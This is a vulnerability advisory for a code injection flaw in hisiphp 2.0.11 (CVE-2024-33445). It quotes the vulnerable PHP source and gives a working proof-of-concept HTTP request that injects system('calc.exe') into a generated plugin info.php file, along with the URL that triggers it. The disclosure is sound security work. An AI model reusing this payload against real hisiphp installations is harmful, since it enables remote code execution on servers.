Code injection vulnerability in hisiphp

CVE-2024-33445.md

A code injection vulnerability in hisiphp 2.0.11

In https://github.com/hisiphp/hisiphp/blob/d05c908c29d574b84aa9e8932b13a5ef54e0a429/application/system/admin/Plugins.php#L129, $data is controlled by users.

$model = new PluginsModel();
$data = $this->request->post();
$result = $this->validate($data, 'app\system\validate\SystemPlugins');
if ($result !== true) {
    return $this->error($result);
}

if (!$model->design($data)) {
    return $this->error($model->getError());
}

The validator https://github.com/hisiphp/hisiphp/blob/thinkphp5.1/v2/application/system/validate/SystemPlugins.php has been used here to impose restrictions on $data, but only some fields have been limited.

class SystemPlugins extends Validate
{
    //定义验证规则
    protected $rule = [
        'name|插件名称'     => 'require|alpha|unique:system_plugins',
        'title|插件标题'     => 'require|chsAlphaNum|unique:system_plugins',
        'identifier|插件标识' => 'require|regex:/^[A-Za-z0-9\-\.\_]+$/',
        'author|开发者'     => 'requireWith:author|chsAlphaNum',
        'url|开发者网址'     => 'requireWith:url|url',
        'version|版本号'     => 'require|regex:/^[0-9][.][0-9][.][0-9]+$/',
    ];
}

In https://github.com/hisiphp/hisiphp/blob/d05c908c29d574b84aa9e8932b13a5ef54e0a429/application/system/model/SystemPlugins.php#L455, $data['intro'] is injected into PHP code without restriction.

<?php
/**
 * 插件基本信息
 */
return [
    // 核心框架[必填]
    'framework' => 'thinkphp5.1',
    // 插件名[必填]
    'name'        => '{$data['name']}',
    // 插件标题[必填]
    'title'       => '{$data['title']}',
    // 模块唯一标识[必填]，格式：插件名.[应用市场ID].plugins.[应用市场分支ID]
    'identifier'  => '{$data['identifier']}',
    // 插件图标[必填]
    'icon'        => '/static/plugins/{$data['name']}/{$data['name']}.png',
    // 插件描述[选填]
    'intro' => '{$data['intro']}',
    // 插件作者[必填]
    'author'      => '{$data['author']}',
    // 作者主页[选填]
    'author_url'  => '{$data['url']}',
    // 版本[必填],格式采用三段式：主版本号.次版本号.修订版本号
    // 主版本号【位数变化：1-99】：当模块出现大更新或者很大的改动，比如整体架构发生变化。此版本号会变化。
    // 次版本号【位数变化：0-999】：当模块功能有新增或删除，此版本号会变化，如果仅仅是补充原有功能时，此版本号不变化。
    // 修订版本号【位数变化：0-999】：一般是 Bug 修复或是一些小的变动，功能上没有大的变化，修复一个严重的bug即发布一个修订版。
    'version'     => '{$data['version']}',
    // 原始数据库表前缀,插件带sql文件时必须配置
    'db_prefix' => 'db_',
    //格式['sort' => '100','title' => '配置标题','name' => '配置名称','type' => '配置类型','options' => '配置选项','value' => '配置默认值', 'tips' => '配置提示'] 各参数设置可参考管理后台->系统->系统功能->配置管理->添加
    'config'    => {$config},
];
INFO;
        file_put_contents($path.'info.php', $code);
    }
}

POC:

POST /admin.php/system/plugins/design.html HTTP/1.1
Host: www.myhisiphp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 209
Origin: http://www.myhisiphp.com
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://www.myhisiphp.com/admin.php/system/plugins/design.html
Cookie: PHPSESSID=fljtslc00l472cll5df60ilp39; hisiadmin_language=zh-cn; hisihisi_admin_theme=default; hisihisi_iframe=1; hisi_language=zh-cn

name=test&title=test&identifier=test&intro=%27%2Esystem%28%27calc%2Eexe%27%29%2E%27&author=test&url=http%3A%2F%2Fwww.test.com&version=1.0.0&dir=admin%0D%0Ahome%0D%0Amodel%0D%0Asql%0D%0Avalidate%0D%0Aview%0D%0A

The content of the generated plugins/test/info.php is as follows:

return [
    //......
    'intro' => ''.system('calc.exe').'',
    //......
];

Visiting /admin.php/system/plugins/install/id/5.html can trigger the execution of malicious code, where 5 is the plugin's id.